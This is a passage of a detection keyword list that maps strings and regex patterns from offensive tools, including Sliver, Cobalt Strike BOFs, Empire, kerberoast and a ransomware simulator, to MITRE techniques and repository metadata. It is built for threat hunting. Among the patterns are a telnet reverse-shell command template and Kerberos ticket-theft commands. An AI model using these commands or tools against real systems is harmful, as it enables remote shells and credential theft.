Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","7","4","382","71","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" 
"*Test-DllExists*",".{0,1000}Test\-DllExists.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","0","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Test-DllExists*",".{0,1000}Test\-DllExists.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*tester@egress-assess.com*",".{0,1000}tester\@egress\-assess\.com.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*testHeapOverflow.*",".{0,1000}testHeapOverflow\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Test-HijackableDll*",".{0,1000}Test\-HijackableDll.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*testing for SQL injection on (custom)*",".{0,1000}testing\sfor\sSQL\sinjection\son\s\(custom\).{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","#contentstrings","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*testing* testing* 1* 2* 3 *",".{0,1000}testing.{0,1000}\stesting.{0,1000}\s1.{0,1000}\s2.{0,1000}\s3\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*test-iodine.log*",".{0,1000}test\-iodine\.log.{0,1000}","offensive_tool_keyword","iodine","iodine. 
iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*TestMyPrivs.ps1*",".{0,1000}TestMyPrivs\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Test-PasswordQuality -WeakPasswordHashesSortedFile *",".{0,1000}Test\-PasswordQuality\s\-WeakPasswordHashesSortedFile\s.{0,1000}","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","N/A","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","AD Enumeration","10","10","1530","244","2024-04-13T19:52:07Z","2015-12-25T13:23:05Z" "*Tests communications to all of the known DNS-over-HTTPS communications providers*",".{0,1000}Tests\scommunications\sto\sall\sof\sthe\sknown\sDNS\-over\-HTTPS\scommunications\sproviders.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*Test-ServiceDaclPermission*",".{0,1000}Test\-ServiceDaclPermission.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Test-ServiceDaclPermission*",".{0,1000}Test\-ServiceDaclPermission.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Test-ServiceDaclPermission*",".{0,1000}Test\-ServiceDaclPermission.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*TestWinRMMachines*",".{0,1000}TestWinRMMachines.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*tevora-threat/SharpView/*",".{0,1000}tevora\-threat\/SharpView\/.{0,1000}","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","1","N/A","10","10","921","179","2024-03-22T16:34:09Z","2018-07-24T21:15:04Z" "*text_to_shellcode\*.exe*",".{0,1000}text_to_shellcode\\.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","WinShellcode","It's a C code project created in Visual Studio that helps you generate shellcode from your C code.","T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/DallasFR/WinShellcode","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*TexttoExe.ps1*",".{0,1000}TexttoExe\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*tezos2john.py*",".{0,1000}tezos2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*TF=*mkfifo * && telnet * 0<*| /bin/sh 1>*",".{0,1000}TF\=.{0,1000}mkfifo\s.{0,1000}\s\&\&\stelnet\s.{0,1000}\s0\<.{0,1000}\|\s\/bin\/sh\s1\>.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","0","N/A","3","10","27","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z" "*tgs::ask /tgt:*",".{0,1000}tgs\:\:ask\s\/tgt\:.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tools","https://github.com/gustanini/PowershellTools","1","0","N/A","10","1","75","12","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z" "*tgscrack.go*",".{0,1000}tgscrack\.go.{0,1000}","offensive_tool_keyword","ASREPRoast","Project that retrieves crackable hashes from KRB5 AS-REP responses for users without kerberoast preauthentication enabled. 
","T1558.003","TA0006","N/A","N/A","Credential Access","https://github.com/HarmJ0y/ASREPRoast","1","1","N/A","N/A","2","187","55","2018-09-25T03:26:00Z","2017-01-14T21:07:57Z" "*tgsrepcrack.*",".{0,1000}tgsrepcrack\..{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Crack with TGSRepCrack","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*tgsrepcrack.py*",".{0,1000}tgsrepcrack\.py.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/nidem/kerberoast","1","1","N/A","N/A","10","1352","314","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" "*TGSThief-main*",".{0,1000}TGSThief\-main.{0,1000}","offensive_tool_keyword","TGSThief","get the TGS of a user whose logon session is just present on the computer","T1558 - T1558.003 - T1078 - T1078.005","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/MzHmO/TGSThief","1","1","N/A","9","2","146","22","2023-07-25T05:30:39Z","2023-07-23T07:47:05Z" "*TGT_backdoor_svc*",".{0,1000}TGT_backdoor_svc.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*TGT_Monitor.ps1*",".{0,1000}TGT_Monitor\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*tgtdeleg /nowrap*",".{0,1000}tgtdeleg\s\/nowrap.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*tgtdelegation *",".{0,1000}tgtdelegation\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - 
T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*tgtdelegation.cna*",".{0,1000}tgtdelegation\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" 
"*tgtdelegation.x64*",".{0,1000}tgtdelegation\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*tgtdelegation.x86*",".{0,1000}tgtdelegation\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - 
T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*tgtParse.py *",".{0,1000}tgtParse\.py\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*th3rd/heroinn*",".{0,1000}th3rd\/heroinn.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","617","209","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" "*TH3xACE/EDR-Test*",".{0,1000}TH3xACE\/EDR\-Test.{0,1000}","offensive_tool_keyword","EDR-Test","Automating EDR Testing with reference to MITRE ATTACK via Cobalt Strike [Purple Team].","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/TH3xACE/EDR-Test","1","1","N/A","N/A","2","142","19","2023-03-27T11:39:32Z","2022-03-27T08:58:49Z" "*Thank you for using ADeleginator. Godspeed! :O*",".{0,1000}Thank\syou\sfor\susing\sADeleginator\.\sGodspeed!\s\:O.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","6","1","65","6","2024-04-30T20:17:27Z","2024-03-04T03:44:52Z" "*Thank you for using DNSCrypt-Proxy!*",".{0,1000}Thank\syou\sfor\susing\sDNSCrypt\-Proxy!.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*Thanks for using 
GTFONow!*",".{0,1000}Thanks\sfor\susing\sGTFONow!.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*THASH /runts /user:*",".{0,1000}THASH\s\/runts\s\/user\:.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*thc-hydra*",".{0,1000}thc\-hydra.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" "*thc-hydra.git*",".{0,1000}thc\-hydra\.git.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" "*The backdoor just signaled an ACK. 
This should not have happened*",".{0,1000}The\sbackdoor\sjust\ssignaled\san\sACK\.\sThis\sshould\snot\shave\shappened.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*The implant command allows users to run commands on slivers from their*",".{0,1000}The\simplant\scommand\sallows\susers\sto\srun\scommands\son\sslivers\sfrom\stheir.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*The malware Go file has been completed.*",".{0,1000}The\smalware\sGo\sfile\shas\sbeen\scompleted\..{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","0","N/A","10","8","789","146","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z" "*The Ransomware for RedTeams Coded by Siddhant Gour with *",".{0,1000}The\sRansomware\sfor\sRedTeams\sCoded\sby\sSiddhant\sGour\swith\s.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware 
attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*The smart password spraying and bruteforcing tool for Active Directory Domain Services*",".{0,1000}The\ssmart\spassword\sspraying\sand\sbruteforcing\stool\sfor\sActive\sDirectory\sDomain\sServices.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" "*the-backdoor-factory-master*",".{0,1000}the\-backdoor\-factory\-master.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3252","785","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z" "*TheCyb3rAlpha/BobTheSmuggler*",".{0,1000}TheCyb3rAlpha\/BobTheSmuggler.{0,1000}","offensive_tool_keyword","BobTheSmuggler","HTML SMUGGLING TOOL 6 allows you to create HTML files with embedded 7z/zip archives. 
